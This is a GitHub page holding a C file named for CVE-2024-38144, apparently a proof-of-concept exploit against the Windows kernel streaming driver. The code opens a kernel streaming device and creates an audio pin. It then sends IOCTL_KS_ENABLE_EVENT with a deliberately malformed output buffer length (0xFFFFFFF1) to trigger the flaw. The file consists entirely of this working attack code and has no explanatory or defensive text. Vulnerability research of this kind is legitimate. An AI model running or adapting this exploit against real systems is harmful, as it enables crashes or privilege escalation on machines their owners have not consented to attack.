-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-38144.c
121 lines (98 loc) · 3.33 KB
/
CVE-2024-38144.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#include <Windows.h>
#include <ks.h>
#include <stdio.h>
#include <ksmedia.h>
#include <initguid.h>
#pragma comment(lib, "ksuser.lib")
#define TEE_INTERFACE L"\\\\?\\root#system#0000#{cf1dda2c-9743-11d0-a3ee-00a0c9223196}\\{cfd669f1-9bc2-11d0-8299-0000f822fe8a}&{cf1dda2c-9743-11d0-a3ee-00a0c9223196}"
#define MALFORMED_OUTPUTBUFFERLENGTH 0xFFFFFFF1
HANDLE CreateKsPin(HANDLE hDevice, ULONG pinId) {
KSPIN_CONNECT ksPinConnect = {0};
ksPinConnect.Interface.Set = KSINTERFACESETID_Standard;
ksPinConnect.Interface.Id = KSINTERFACE_STANDARD_STREAMING;
ksPinConnect.Interface.Flags = 0;
ksPinConnect.Medium.Set = KSMEDIUMSETID_Standard;
ksPinConnect.Medium.Id = KSMEDIUM_STANDARD_DEVIO;
ksPinConnect.Medium.Flags = 0;
ksPinConnect.PinId = pinId;
ksPinConnect.PinToHandle = NULL;
ksPinConnect.Priority.PriorityClass = KSPRIORITY_NORMAL;
ksPinConnect.Priority.PrioritySubClass = KSPRIORITY_NORMAL;
// KSDATAFORMAT for audio stream setup
KSDATAFORMAT ksDataFormat = {0};
ksDataFormat.FormatSize = sizeof(KSDATAFORMAT);
ksDataFormat.Flags = 0;
ksDataFormat.MajorFormat = KSDATAFORMAT_TYPE_AUDIO;
ksDataFormat.SubFormat = KSDATAFORMAT_SUBTYPE_PCM;
ksDataFormat.Specifier = KSDATAFORMAT_SPECIFIER_WAVEFORMATEX;
// Allocate memory for both KSPIN_CONNECT and KSDATAFORMAT
ULONG connSize = sizeof(KSPIN_CONNECT) + sizeof(KSDATAFORMAT);
PKSPIN_CONNECT ksPinConn = (PKSPIN_CONNECT)malloc(connSize);
memcpy(ksPinConn, &ksPinConnect, sizeof(KSPIN_CONNECT));
memcpy(ksPinConn + 1, &ksDataFormat, sizeof(KSDATAFORMAT));
HANDLE pinHandle = NULL;
DWORD status = KsCreatePin(hDevice, ksPinConn, GENERIC_READ, &pinHandle);
free(ksPinConn);
if (!SUCCEEDED(status)) {
printf("Failed to create pin.\n");
return NULL;
}
return pinHandle;
}
// Function to send IOCTL_KS_ENABLE_EVENT
BOOL SendIoctlKsEnableEvent(HANDLE pinHandle) {
KSEVENT ksevent = {0};
ksevent.Set = KSEVENTSETID_Connection;
ksevent.Id = KSEVENT_CONNECTION_ENDOFSTREAM;
ksevent.Flags = KSEVENT_TYPE_ENABLE;
KSEVENTDATA eventData = {0};
eventData.NotificationType = KSEVENTF_EVENT_HANDLE;
eventData.EventHandle.Event = CreateEvent(NULL, FALSE, FALSE, NULL);
DWORD bytesReturned = 0;
BOOL result = DeviceIoControl(
pinHandle,
IOCTL_KS_ENABLE_EVENT,
&ksevent,
sizeof(ksevent),
&eventData,
MALFORMED_OUTPUTBUFFERLENGTH,
&bytesReturned,
NULL
);
if (!result) {
printf("Failed to send IOCTL_KS_ENABLE_EVENT.\n");
return FALSE;
}
return TRUE;
}
int main() {
HANDLE hDevice = CreateFileW(
TEE_INTERFACE,
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE) {
printf("Failed to open device.\n");
return -1;
}
HANDLE pinHandle = CreateKsPin(hDevice, 0);
if (pinHandle == NULL) {
CloseHandle(hDevice);
return -1;
}
// Send IOCTL_KS_ENABLE_EVENT
if (!SendIoctlKsEnableEvent(pinHandle)) {
CloseHandle(pinHandle);
CloseHandle(hDevice);
return -1;
}
printf("IOCTL_KS_ENABLE_EVENT sent successfully.\n");
// Cleanup handles
CloseHandle(pinHandle);
CloseHandle(hDevice);
return 0;
}